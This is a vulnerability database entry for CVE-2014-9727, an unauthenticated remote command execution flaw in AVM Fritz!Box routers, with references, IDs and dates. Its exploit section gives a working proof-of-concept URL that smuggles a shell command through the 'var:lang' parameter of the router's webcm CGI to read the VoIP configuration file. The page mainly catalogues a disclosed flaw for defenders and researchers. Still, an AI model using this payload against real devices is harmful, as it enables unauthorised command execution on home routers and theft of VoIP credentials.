ID
VAR-E-201405-0185
CVE
| cve_id: | CVE-2014-9727 | Trust: 1.9 |
EDB ID
33136
TITLE
Fritz!Box - Remote Command Execution - Hardware webapps Exploit
Trust: 0.6
DESCRIPTION
Fritz!Box - Remote Command Execution. CVE-103289CVE-2014-9727 . webapps exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | fritz box | model: | - | scope: | - | version: | - | Trust: 1.6 |
| vendor: | avm | model: | fritz!box | scope: | eq | version: | 0 | Trust: 0.3 |
EXPLOIT
App : Fritz!Box
Author : 0x4148
Fritz!Box is Networking/voice Over ip router produced by AVM it suffer from Unauthenticated remote command execution flaw
Poc :
https://ip/cgi-bin/webcm?getpage=../html/menus/menu2.html&var:lang=%26%20cat%20/var/flash/voip.cfg%20%26
#0x4148_rise
Trust: 1.0
EXPLOIT LANGUAGE
txt
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Remote Command Execution
Trust: 1.0
CREDITS
0x4148
Trust: 0.6
EXTERNAL IDS
| db: | NVD | id: | CVE-2014-9727 | Trust: 1.9 |
| db: | EXPLOIT-DB | id: | 33136 | Trust: 1.6 |
| db: | EDBNET | id: | 57059 | Trust: 0.6 |
| db: | BID | id: | 74927 | Trust: 0.3 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2014-9727 | Trust: 1.6 |
| url: | https://www.exploit-db.com/exploits/33136/ | Trust: 0.6 |
| url: | https://www.trustwave.com/resources/spiderlabs-blog/-honeypot-alert--fritz!box-%e2%80%93-remote-command-execution-exploit-attempt/ | Trust: 0.3 |
| url: | http://en.avm.de/ | Trust: 0.3 |
SOURCES
| db: | BID | id: | 74927 |
| db: | EXPLOIT-DB | id: | 33136 |
| db: | EDBNET | id: | 57059 |
LAST UPDATE DATE
2022-07-27T09:30:06.451000+00:00
SOURCES UPDATE DATE
| db: | BID | id: | 74927 | date: | 2015-05-26T00:00:00 |
SOURCES RELEASE DATE
| db: | BID | id: | 74927 | date: | 2015-05-26T00:00:00 |
| db: | EXPLOIT-DB | id: | 33136 | date: | 2014-05-01T00:00:00 |
| db: | EDBNET | id: | 57059 | date: | 2014-05-01T00:00:00 |